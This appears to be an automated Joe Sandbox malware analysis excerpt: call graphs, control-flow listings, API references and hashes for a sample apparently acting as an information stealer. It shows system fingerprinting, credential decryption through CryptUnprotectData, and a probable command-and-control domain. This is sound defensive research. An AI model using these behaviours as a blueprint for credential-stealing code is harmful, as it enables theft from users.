14070 426619 14070->14022 14100 439de0 14070->14100 14072 426fb6 14072->14022 14072->14072 14074 4297f0 14073->14074 14074->14074 14075 429889 RtlExpandEnvironmentStrings 14074->14075 14076 4298d0 14075->14076 14076->14076 14077->14005 14078->14001 14081 43fe50 14079->14081 14080 43ff5f 14080->14056 14081->14080 14083 43e0f0 LdrInitializeThunk 14081->14083 14083->14080 14084->14060 14085->14067 14087 426670 14086->14087 14087->14087 14107 43c210 14087->14107 14092 42670e 14095 4267d0 14092->14095 14098 42671a 14092->14098 14121 43ca40 14092->14121 14097 426907 14095->14097 14095->14098 14129 43c980 14095->14129 14097->14070 14098->14098 14099 426fca 14098->14099 14133 43c5d0 14098->14133 14099->14070 14105 439e10 14100->14105 14101 43fe30 LdrInitializeThunk 14101->14105 14103 439fdc 14103->14072 14105->14101 14105->14103 14144 4402d0 14105->14144 14154 440ac0 14105->14154 14164 43e0f0 LdrInitializeThunk 14105->14164 14108 43c230 14107->14108 14110 43c28e 14108->14110 14137 43e0f0 LdrInitializeThunk 14108->14137 14109 426702 14117 43c480 14109->14117 14110->14109 14112 43c1c0 RtlAllocateHeap 14110->14112 14114 43c2fa 14112->14114 14113 43c1e0 RtlFreeHeap 14113->14109 14116 43c36e 14114->14116 14138 43e0f0 LdrInitializeThunk 14114->14138 14116->14113 14118 43c491 14117->14118 14119 43c54e 14117->14119 14118->14119 14139 43e0f0 LdrInitializeThunk 14118->14139 14119->14092 14123 43ca90 14121->14123 14122 43d1fe 14122->14092 14128 43caee 14123->14128 14140 43e0f0 LdrInitializeThunk 14123->14140 14125 43d189 14125->14122 14141 43e0f0 LdrInitializeThunk 14125->14141 14127 43e0f0 LdrInitializeThunk 14127->14128 14128->14122 14128->14125 14128->14127 14130 43c9a0 14129->14130 14130->14130 14131 43ca0e 14130->14131 14142 43e0f0 LdrInitializeThunk 14130->14142 14131->14095 14134 43c5da 14133->14134 14136 426dfa 14133->14136 14134->14136 14143 43e0f0 LdrInitializeThunk 14134->14143 14136->14070 14137->14110 14138->14116 14139->14119 14140->14128 14141->14122 14142->14131 14143->14136 14145 4402e0 14144->14145 14146 44037e 14145->14146 14165 43e0f0 LdrInitializeThunk 14145->14165 14147 4406d7 14146->14147 14149 43c1c0 RtlAllocateHeap 14146->14149 14147->14105 14150 440448 14149->14150 14153 44050e 14150->14153 14166 43e0f0 LdrInitializeThunk 14150->14166 14151 43c1e0 RtlFreeHeap 14151->14147 14153->14151 14155 440ad1 14154->14155 14155->14155 14157 440c6f 14155->14157 14167 43e0f0 LdrInitializeThunk 14155->14167 14156 440edb 14156->14105 14157->14156 14158 43c1c0 RtlAllocateHeap 14157->14158 14160 440d04 14158->14160 14162 440e1f 14160->14162 14168 43e0f0 LdrInitializeThunk 14160->14168 14161 43c1e0 RtlFreeHeap 14161->14156 14162->14161 14164->14105 14165->14146 14166->14153 14167->14157 14168->14162 13825 43e7de 13827 43e74d 13825->13827 13826 43e831 13827->13826 13830 43e0f0 LdrInitializeThunk 13827->13830 13829 43e852 13830->13829 14169 40e11f 14170 40e130 14169->14170 14173 438c90 14170->14173 14172 40e24c 14172->14172 14174 438cc0 CoCreateInstance 14173->14174 14176 439240 14174->14176 14177 438e4e SysAllocString 14174->14177 14179 439254 GetVolumeInformationW 14176->14179 14180 438f06 14177->14180 14186 43926b 14179->14186 14181 43922f SysFreeString 14180->14181 14182 438f0e CoSetProxyBlanket 14180->14182 14181->14176 14183 439225 14182->14183 14184 438f2e SysAllocString 14182->14184 14183->14181 14187 439000 14184->14187 14186->14172 14187->14187 14188 439045 SysAllocString 14187->14188 14191 43906f 14188->14191 14189 439213 SysFreeString SysFreeString 14189->14183 14190 439209 SysFreeString 14190->14189 14191->14189 14191->14190 14192 4390b3 VariantInit 14191->14192 14194 439100 14192->14194 14193 4391f8 VariantClear 14193->14190 14194->14193 14195 4379a2 14196 4379b9 14195->14196 14198 437a70 14196->14198 14199 43e0f0 LdrInitializeThunk 14196->14199 14199->14196 13831 4388e0 13832 438900 13831->13832 13834 438a28 13832->13834 13840 43e0f0 LdrInitializeThunk 13832->13840 13836 438c1e 13834->13836 13837 438b2e 13834->13837 13839 43e0f0 LdrInitializeThunk 13834->13839 13837->13836 13841 43e0f0 LdrInitializeThunk 13837->13841 13839->13837 13840->13834 13841->13836 13842 4104e7 13843 4104ec 13842->13843 13844 41074b RtlExpandEnvironmentStrings 13843->13844 13848 40ee9f 13843->13848 13849 4107af 13844->13849 13846 410d8f 13855 4146d0 13846->13855 13849->13848 13850 408b60 13849->13850 13870 4085b0 ExitProcess 13850->13870 13852 408ba3 13854 408bec 13852->13854 13871 4085b0 ExitProcess 13852->13871 13854->13846 13856 4146f0 13855->13856 13872 4410f0 13856->13872 13858 41487d 13859 4148a5 13858->13859 13862 414a88 13858->13862 13863 414906 13858->13863 13864 4148c3 13858->13864 13867 4148f7 13858->13867 13882 4414f0 13858->13882 13861 4414f0 LdrInitializeThunk 13859->13861 13861->13864 13862->13863 13886 43e0f0 LdrInitializeThunk 13862->13886 13863->13848 13864->13862 13864->13863 13864->13867 13876 441600 13864->13876 13866 4414f0 LdrInitializeThunk 13866->13867 13867->13862 13867->13863 13867->13866 13869 4410f0 LdrInitializeThunk 13867->13869 13869->13867 13870->13852 13871->13852 13874 441110 13872->13874 13873 44128e 13873->13858 13874->13873 13887 43e0f0 LdrInitializeThunk 13874->13887 13878 441620 13876->13878 13877 4417ae 13877->13867 13880 4416bf 13878->13880 13888 43e0f0 LdrInitializeThunk 13878->13888 13880->13877 13889 43e0f0 LdrInitializeThunk 13880->13889 13883 441510 13882->13883 13883->13883 13884 4415ae 13883->13884 13890 43e0f0 LdrInitializeThunk 13883->13890 13884->13859 13886->13863 13887->13873 13888->13880 13889->13877 13890->13884 14200 4301ab SysFreeString 14201 430309 14200->14201 13891 43e86a 13892 43e880 13891->13892 13895 43e0f0 LdrInitializeThunk 13892->13895 13894 43e9cf 13895->13894 14202 42ef29 14203 42ef5b SysAllocString 14202->14203 14205 42f0fc 14203->14205 13896 42c4f6 13897 42c500 13896->13897 13898 42c5b9 GetPhysicallyInstalledSystemMemory 13897->13898 13899 42c5e0 13898->13899 13899->13899 13900 43e3f6 13902 43e430 13900->13902 13901 43e59e 13902->13901 13904 43e0f0 LdrInitializeThunk 13902->13904 13904->13901 13905 42c97f 13907 42c9b0 13905->13907 13906 42caae 13907->13906 13909 43e0f0 LdrInitializeThunk 13907->13909 13909->13906 13910 40c9fd CoInitializeSecurity
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !$0\$1]$2]$=]$B]$D$D$GI$GI$H]$I7$N]$O]$Ok$R$Wo$[r$`$tL$<$]$]$]$]
                                                                                                        • API String ID: 0-3810882205
                                                                                                        • Opcode ID: 7c9e0f59f5c4572d9e1288cdfaa973e8028cf2faf673f747c4db689a469be775
                                                                                                        • Instruction ID: 26e37b5a27921351f131a8d65d8dd6bf57fb013c5090a7881b03709181e5621c
                                                                                                        • Opcode Fuzzy Hash: 7c9e0f59f5c4572d9e1288cdfaa973e8028cf2faf673f747c4db689a469be775
                                                                                                        • Instruction Fuzzy Hash: A703AD7161C3508BD328DF28C5853AFB7E1AFC5310F158A2EE9D997391E77889818B4B

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 429 438c90-438cbb 430 438cc0-438d08 429->430 430->430 431 438d0a-438d18 430->431 432 438d20-438d54 431->432 432->432 433 438d56-438d9f 432->433 434 438da0-438dd5 433->434 434->434 435 438dd7-438df0 434->435 437 438df2 435->437 438 438dfa-438e48 CoCreateInstance 435->438 437->438 439 439244-439269 call 43f940 GetVolumeInformationW 438->439 440 438e4e-438e7f 438->440 445 439273-439275 439->445 446 43926b-43926f 439->446 441 438e80-438edb 440->441 441->441 443 438edd-438f08 SysAllocString 441->443 451 43922f-439240 SysFreeString 443->451 452 438f0e-438f28 CoSetProxyBlanket 443->452 447 439299-4392a0 445->447 446->445 449 4392a2-4392a9 447->449 450 4392ac-4392da 447->450 449->450 453 4392e0-4392fa 450->453 451->439 454 439225-43922b 452->454 455 438f2e-438f43 452->455 453->453 456 4392fc-43932a call 41d520 453->456 454->451 458 438f50-438f7a 455->458 463 439330-43933b 456->463 458->458 460 438f7c-438ff2 SysAllocString 458->460 462 439000-439043 460->462 462->462 464 439045-439071 SysAllocString 462->464 463->463 465 43933d-439349 463->465 469 439213-439223 SysFreeString * 2 464->469 470 439077-439099 464->470 467 439280-439293 465->467 468 43934f-43935f call 407fb0 465->468 467->447 471 439364-43936b 467->471 468->467 469->454 475 439209-439210 SysFreeString 470->475 476 43909f-4390a2 470->476 475->469 476->475 477 4390a8-4390ad 476->477 477->475 478 4390b3-4390fb VariantInit 477->478 479 439100-43911a 478->479 479->479 480 43911c-43912c 479->480 482 439132-439138 480->482 483 4391f8-439205 VariantClear 480->483 482->483 484 43913e-43914c 482->484 483->475 485 43914e-439153 484->485 486 43918d 484->486 488 43916c-439170 485->488 487 43918f-4391b7 call 407f30 call 408cf0 486->487 499 4391b9 487->499 500 4391be-4391ce 487->500 489 439172-43917b 488->489 490 439160 488->490 492 439182-439186 489->492 493 43917d-439180 489->493 495 439161-43916a 490->495 492->495 496 439188-43918b 492->496 493->495 495->487 495->488 496->495 499->500 501 4391d0 500->501 502 4391d5-4391f4 call 407f60 call 407f40 500->502 501->502 502->483
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C,00000000), ref: 00438E40
                                                                                                        • SysAllocString.OLEAUT32(61B56187), ref: 00438EE2
                                                                                                        • CoSetProxyBlanket.COMBASE(1DC04096,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438F20
                                                                                                        • SysAllocString.OLEAUT32(61B56187), ref: 00438F7D
                                                                                                        • SysAllocString.OLEAUT32(3E123E2D), ref: 0043904A
                                                                                                        • VariantInit.OLEAUT32(5B745B4F), ref: 004390B8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                        • String ID: 2>6>$3>$>$7>c>$C$O[t[$\$d>o>$f>>$v>
                                                                                                        • API String ID: 65563702-2290779530
                                                                                                        • Opcode ID: 38e3d282e63bcbfb1644009ead8865c251bf27a565a09847d5bf744115630eea
                                                                                                        • Instruction ID: c0e79de85990c71ab815b91cf48e4bfa203ec5810b040c1c91de88aa8a84c684
                                                                                                        • Opcode Fuzzy Hash: 38e3d282e63bcbfb1644009ead8865c251bf27a565a09847d5bf744115630eea
                                                                                                        • Instruction Fuzzy Hash: 8C02DF72A08301ABD710DF64CC85B6BB7A6EFC9714F14892DF581AB390D779D805CB8A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 526 422870-4228bf 527 4228c0-42293c 526->527 527->527 528 42293e-42297f RtlExpandEnvironmentStrings 527->528 529 422980-4229a5 528->529 529->529 530 4229a7-4229b1 529->530 531 422a00-422a0c 530->531 532 422b20-422b29 530->532 533 422b10-422b17 530->533 534 4229f7-4229fd call 407f40 530->534 535 422cd5-422d7f 530->535 536 422cba 530->536 537 4229b8-4229be 530->537 538 422ca8-422cb2 530->538 539 4229ef 530->539 540 422a0d-422a16 530->540 543 422b32 532->543 544 422b2b-422b30 532->544 533->532 534->531 547 422d80-422d98 535->547 545 4229c0-4229c5 537->545 546 4229c7 537->546 538->536 539->534 541 422a18-422a1d 540->541 542 422a1f 540->542 550 422a26-422a5a call 407f30 541->550 542->550 551 422b39-422bdf call 407f30 543->551 544->551 552 4229ca-4229e8 call 407f30 RtlExpandEnvironmentStrings 545->552 546->552 547->547 553 422d9a-422daa call 420820 547->553 562 422a60-422a9b 550->562 563 422be0-422c25 551->563 552->531 552->532 552->533 552->534 552->535 552->536 552->538 552->539 552->540 564 422cc0-422cc6 call 407f40 552->564 565 422dba-422ddb 552->565 558 422daf-422db2 553->558 558->565 562->562 568 422a9d-422aa5 562->568 563->563 569 422c27-422c33 563->569 587 422ccf 564->587 566 422de0-422e11 565->566 566->566 570 422e13-422e9b 566->570 572 422ac1-422acd 568->572 573 422aa7-422aaf 568->573 574 422c51-422c5d 569->574 575 422c35-422c3f 569->575 576 422ea0-422edf 570->576 578 422af1-422afc call 4412e0 572->578 579 422acf-422ad3 572->579 577 422ab0-422abf 573->577 581 422c81-422ca1 GetLogicalDrives call 4412e0 574->581 582 422c5f-422c63 574->582 580 422c40-422c4f 575->580 576->576 586 422ee1-422f0a call 4202f0 576->586 577->572 577->577 589 422b01-422b09 578->589 588 422ae0-422aef 579->588 580->574 580->580 581->531 581->534 581->536 581->538 581->564 581->565 581->587 592 422f14 581->592 593 422f1a-422f20 call 407f40 581->593 584 422c70-422c7f 582->584 584->581 584->584 586->592 587->535 588->578 588->588 589->532 589->533 589->535 589->536 589->538 589->564 589->565 592->593
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00422970
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004229DD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: *,=,$,,=,$diJ$LQL
                                                                                                        • API String ID: 237503144-2531928868
                                                                                                        • Opcode ID: 841c2c15685187bd954a2d995779f68ece85c9bd557ea18b83c4609880cd3a89
                                                                                                        • Instruction ID: e81b2ff4bd20acc539124ec0c676da8b120a63586ebe534c2a7055d2906807d5
                                                                                                        • Opcode Fuzzy Hash: 841c2c15685187bd954a2d995779f68ece85c9bd557ea18b83c4609880cd3a89
                                                                                                        • Instruction Fuzzy Hash: 8CF121B66183148FC314DF54E98162BB7E1FFC6344F04896DE5C59B360E7B89A09CB8A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 597 4104e7-410599 call 413d90 * 3 call 401870 * 2 608 41059b-4105d3 call 413950 597->608 609 41059d 597->609 617 4105d5 608->617 618 4105d7-410652 call 407f30 call 40a5e0 call 401870 608->618 611 410e54 609->611 612 4118a7 611->612 614 4118a9-4118ba call 401f30 612->614 624 40eeb2-40ef4a call 401f40 call 401e30 614->624 625 40eeab-4118cb 614->625 617->618 634 410654 618->634 635 410656-41069e call 413950 618->635 636 40ef4c-40efce call 413d90 call 401970 624->636 637 40ef4e 624->637 638 4106d2-41071c call 413950 634->638 649 4106a0 635->649 650 4106a2-4106cd call 407f30 call 40a5e0 635->650 636->612 659 40efd4 636->659 637->614 646 410720-4107ad call 407f30 call 40a5e0 RtlExpandEnvironmentStrings 638->646 647 41071e 638->647 661 4107af-4107b2 646->661 647->646 649->650 650->638 659->612 662 4107b4-4107d7 661->662 663 4107d9-4107e5 661->663 662->661 664 4107e7-410815 663->664 665 4107e9-4107f7 call 407f40 663->665 669 410817 664->669 670 410819-41085f call 407f30 664->670 673 410e52 665->673 669->670 676 410861-41087b call 407f40 * 2 670->676 677 410880-41090b call 407f40 call 401870 670->677 673->611 694 410e50 676->694 688 41090d-410930 call 413950 677->688 689 41095c-4109c3 call 401b80 677->689 701 410932 688->701 702 410934-41095a call 407f30 call 40a5e0 688->702 697 4109ca-4109cd 689->697 694->673 699 410a00-410a20 call 401a80 697->699 700 4109cf-4109fe 697->700 707 410d43-410daf call 408b60 call 4146d0 699->707 708 410a26-410a55 call 401f30 699->708 700->697 701->702 702->689 717 410db4-410dc3 call 4095a0 707->717 718 410a57 708->718 719 410a59-410a77 call 407f30 708->719 726 410dc5-410dd4 717->726 727 410df9-410e20 call 407f40 * 2 717->727 718->719 724 410aa0-410aa2 719->724 725 410a79-410a87 719->725 730 410aa4-410ab0 724->730 734 410a89-410a95 call 413a80 725->734 731 410dd6 726->731 732 410de8-410df7 call 407f40 726->732 759 410e22-410e25 call 407f40 727->759 760 410e2a-410e34 727->760 736 410ac0-410afe call 401f40 730->736 737 410ab2-410abb 730->737 738 410dd8-410de4 call 413c10 731->738 732->727 750 410a97-410a9e 734->750 752 410b00-410b03 736->752 737->707 749 410de6 738->749 749->732 750->724 754 410b05-410b37 752->754 755 410b39-410b77 call 401870 752->755 754->752 761 410b7e-410b81 755->761 759->760 763 410e44-410e4b call 408c40 760->763 764 410e36-410e3f call 407f40 760->764 767 410b83-410bd2 761->767 768 410bd4-410c12 call 401870 761->768 763->694 764->763 767->761 772 410c19-410c1c 768->772 773 410c56-410c95 call 401b80 772->773 774 410c1e-410c54 772->774 777 410c97-410c9a 773->777 774->772 778 410cd4-410d3e call 401b80 call 413aa0 777->778 779 410c9c-410cd2 777->779 778->730 779->777
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL ref: 00410782
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: 6L$7$di$rj$
                                                                                                        • API String ID: 237503144-3659263430
                                                                                                        • Opcode ID: 5a11074f47a8175fa62817934415b2d3420978d561d6e4037c068776ddd5e059
                                                                                                        • Instruction ID: 93c5423282e88211a1001a396d865792dd41de102bbe3f695b7f2f8a3b7159a9
                                                                                                        • Opcode Fuzzy Hash: 5a11074f47a8175fa62817934415b2d3420978d561d6e4037c068776ddd5e059
                                                                                                        • Instruction Fuzzy Hash: 48328C75A0D3408BC364AF79C5813EFBBE0AF84354F14892FE5D997391DA7889818B4B

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 909 4085d0-4085e1 call 43d580 912 4085e7-4085ee call 4361e0 909->912 913 408998-40899a ExitProcess 909->913 916 408981-408988 912->916 917 4085f4-40862b GetCurrentProcessId GetCurrentThreadId 912->917 920 408993 call 43e040 916->920 921 40898a-408990 call 407f40 916->921 918 408633-4087bb SHGetSpecialFolderPathW 917->918 919 40862d-408631 917->919 922 4087c0-40880e 918->922 919->918 920->913 921->920 922->922 925 408810-40883f call 43c1c0 922->925 929 408840-40885c 925->929 930 408876-40888f GetForegroundWindow 929->930 931 40885e-408874 929->931 932 408930-408975 call 409ae0 930->932 933 408895-4088b0 930->933 931->929 932->916 938 408977 call 40c820 932->938 934 4088b2-4088b4 933->934 935 4088b6-40892e 933->935 934->935 935->932 940 40897c call 40b3b0 938->940 940->916
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004085F4
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004085FE
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040875A
                                                                                                        • GetForegroundWindow.USER32 ref: 00408887
                                                                                                          • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32(00408981), ref: 0040B3B6
                                                                                                          • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32 ref: 0040B3D7
                                                                                                        • ExitProcess.KERNEL32 ref: 0040899A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3676751680-0
                                                                                                        • Opcode ID: 3501a65e4930fe3fa56a037192b4047e99a07fb4919e639947ba2e74cc683e01
                                                                                                        • Instruction ID: ad6200de4210d9a04599fce77ba0fdf2601055967606580d5498285a901ef58c
                                                                                                        • Opcode Fuzzy Hash: 3501a65e4930fe3fa56a037192b4047e99a07fb4919e639947ba2e74cc683e01
                                                                                                        • Instruction Fuzzy Hash: B7A10776B443044BC308EF69DD9136AF6D6ABC8310F0DD43EA885DB395EEBC9D058685

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 942 40d643-40d662 call 4095a0 CoUninitialize 945 40d670-40d6d8 942->945 945->945 946 40d6da-40d6f2 945->946 947 40d700-40d735 946->947 947->947 948 40d737-40d779 947->948 949 40d780-40d7f5 948->949 949->949 950 40d7f7-40d801 949->950 951 40d803-40d80b 950->951 952 40d81b-40d826 950->952 953 40d810-40d819 951->953 954 40d828-40d82f 952->954 955 40d83d 952->955 953->952 953->953 956 40d830-40d839 954->956 957 40d840-40d848 955->957 956->956 958 40d83b 956->958 959 40d84a-40d84d 957->959 960 40d85d 957->960 958->957 962 40d850-40d859 959->962 961 40d860-40d86b 960->961 963 40d87b-40d885 961->963 964 40d86d-40d86f 961->964 962->962 965 40d85b 962->965 967 40d887-40d88a 963->967 968 40d89b-40d8a9 963->968 966 40d870-40d879 964->966 965->961 966->963 966->966 969 40d890-40d899 967->969 970 40d8c1-40d982 968->970 971 40d8ab-40d8af 968->971 969->968 969->969 973 40d990-40d9ea 970->973 972 40d8b0-40d8bd 971->972 972->972 974 40d8bf 972->974 973->973 975 40d9ec-40da06 973->975 974->970 976 40da10-40da76 975->976 976->976 977 40da78-40dae3 call 40b3e0 call 4095a0 CoUninitialize 976->977 982 40daf0-40db5b 977->982 982->982 983 40db5d-40db72 982->983 984 40db80-40dbb8 983->984 984->984 985 40dbba-40dbff 984->985 986 40dc00-40dc75 985->986 986->986 987 40dc77-40dc84 986->987 988 40dc86-40dc88 987->988 989 40dc9b-40dca6 987->989 990 40dc90-40dc99 988->990 991 40dcc0 989->991 992 40dca8-40dcaf 989->992 990->989 990->990 993 40dcc3-40dccb 991->993 994 40dcb0-40dcb9 992->994 995 40dcf0 993->995 996 40dccd-40dcd3 993->996 994->994 997 40dcbb 994->997 999 40dcf3-40dcfe 995->999 998 40dce0-40dce9 996->998 997->993 998->998 1000 40dceb 998->1000 1001 40dd00-40dd01 999->1001 1002 40dd1b-40dd23 999->1002 1000->999 1003 40dd10-40dd19 1001->1003 1004 40dd25-40dd28 1002->1004 1005 40dd3b-40dd47 1002->1005 1003->1002 1003->1003 1006 40dd30-40dd39 1004->1006 1007 40dd61-40de2f 1005->1007 1008 40dd49-40dd4b 1005->1008 1006->1005 1006->1006 1009 40de30-40de8a 1007->1009 1010 40dd50-40dd5d 1008->1010 1009->1009 1011 40de8c-40deaf 1009->1011 1010->1010 1012 40dd5f 1010->1012 1013 40deb0-40df0e 1011->1013 1012->1007 1013->1013 1014 40df10-40df2d call 40b3e0 1013->1014 1016 40df32-40df49 1014->1016
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Uninitialize
                                                                                                        • String ID: permissiblene.click
                                                                                                        • API String ID: 3861434553-3120127257
                                                                                                        • Opcode ID: 5c3e07459faded43a0ba1ce952c9247a7474cd129e8cbe0b407761016ea04f75
                                                                                                        • Instruction ID: 5cdfe13503f33a145c73b8f78b442bb27e6af6bd9d2eacdeba7417bbc26f7e4a
                                                                                                        • Opcode Fuzzy Hash: 5c3e07459faded43a0ba1ce952c9247a7474cd129e8cbe0b407761016ea04f75
                                                                                                        • Instruction Fuzzy Hash: A34225756057418FD328CF39C990622BBE3FF9630071996ADD4868F7A6DB39E806CB44

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1017 42c4f6-42c521 call 433330 call 407f40 1022 42c530-42c556 1017->1022 1022->1022 1023 42c558-42c55d 1022->1023 1024 42c56b-42c577 1023->1024 1025 42c55f 1023->1025 1027 42c591-42c5d8 call 43f940 GetPhysicallyInstalledSystemMemory 1024->1027 1028 42c579-42c57b 1024->1028 1026 42c560-42c569 1025->1026 1026->1024 1026->1026 1033 42c5e0-42c6a0 1027->1033 1030 42c580-42c58d 1028->1030 1030->1030 1031 42c58f 1030->1031 1031->1027 1033->1033 1034 42c6a6-42c6df call 41d520 1033->1034 1037 42c6e0-42c71f 1034->1037 1037->1037 1038 42c721-42c726 1037->1038 1039 42c728-42c72b 1038->1039 1040 42c73d 1038->1040 1041 42c730-42c739 1039->1041 1042 42c73f-42c74a 1040->1042 1041->1041 1043 42c73b 1041->1043 1044 42c75b-42c766 1042->1044 1045 42c74c-42c74f 1042->1045 1043->1042 1047 42c77b-42c7c9 1044->1047 1048 42c768-42c769 1044->1048 1046 42c750-42c759 1045->1046 1046->1044 1046->1046 1050 42c7d0-42c83b 1047->1050 1049 42c770-42c779 1048->1049 1049->1047 1049->1049 1050->1050 1051 42c83d-42c842 1050->1051 1052 42c844-42c84a 1051->1052 1053 42c85d-42c860 1051->1053 1054 42c850-42c859 1052->1054 1055 42c862-42c86a 1053->1055 1054->1054 1056 42c85b 1054->1056 1057 42c87b-42c8f7 1055->1057 1058 42c86c-42c86f 1055->1058 1056->1055 1059 42c870-42c879 1058->1059 1059->1057 1059->1059
                                                                                                        APIs
                                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C5BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                                        • String ID: UzUy
                                                                                                        • API String ID: 3960555810-1793371523
                                                                                                        • Opcode ID: 330b5ba03eeb65544f05e8023bc46f0aadf77a918e824a83d5395c3f738fefd6
                                                                                                        • Instruction ID: a9889ccade49914761779446ee1e12bcc6830a2b46294e2a06ffadc3a624b005
                                                                                                        • Opcode Fuzzy Hash: 330b5ba03eeb65544f05e8023bc46f0aadf77a918e824a83d5395c3f738fefd6
                                                                                                        • Instruction Fuzzy Hash: 36C1D3B56047428FD729CF29C490766BBE2BF9A300F18C56EC4DAC77A1DB39A446CB44

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1060 4164fd-4164ff 1061 418a6f-418a75 1060->1061 1062 418dfb-418dfd 1061->1062 1063 418a7b-418a8c 1061->1063 1062->1061 1064 418a93 1063->1064 1065 418a8e-418a91 1063->1065 1066 418a94-418aa0 1064->1066 1065->1064 1065->1066 1067 418aa2-418aa5 1066->1067 1068 418aa7 1066->1068 1067->1068 1069 418aa8-418ac2 call 407f30 1067->1069 1068->1069 1072 418ac8-418acf 1069->1072 1073 418bcd-418c04 call 43f940 1069->1073 1074 418af0-418b3d call 41cc50 * 2 1072->1074 1077 418c09-418c2d CryptUnprotectData 1073->1077 1081 418ae0-418aea 1074->1081 1082 418b3f-418b5a call 41cc50 1074->1082 1077->1062 1081->1073 1081->1074 1082->1081 1085 418b5c-418b85 1082->1085 1086 418ad5-418ad9 1085->1086 1087 418b8b-418ba1 call 41cc50 1085->1087 1086->1081 1090 418ad1 1087->1090 1091 418ba7-418bc8 1087->1091 1090->1086 1091->1081
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418C23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptDataUnprotect
                                                                                                        • String ID: OzA
                                                                                                        • API String ID: 834300711-1351414677
                                                                                                        • Opcode ID: 980f7e20317f797d1d84ed87af443f0ef7f9ef54927ba0c62178187bca58ab68
                                                                                                        • Instruction ID: 9c97545d1ec6c4f6ccf0580d26e68663f345747e0ab963785eb3c0ade874f854
                                                                                                        • Opcode Fuzzy Hash: 980f7e20317f797d1d84ed87af443f0ef7f9ef54927ba0c62178187bca58ab68
                                                                                                        • Instruction Fuzzy Hash: FB51A0B150C3429FC724CF18C4916ABB7E1AF94344F19492EE4DA87342DB38ED49CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
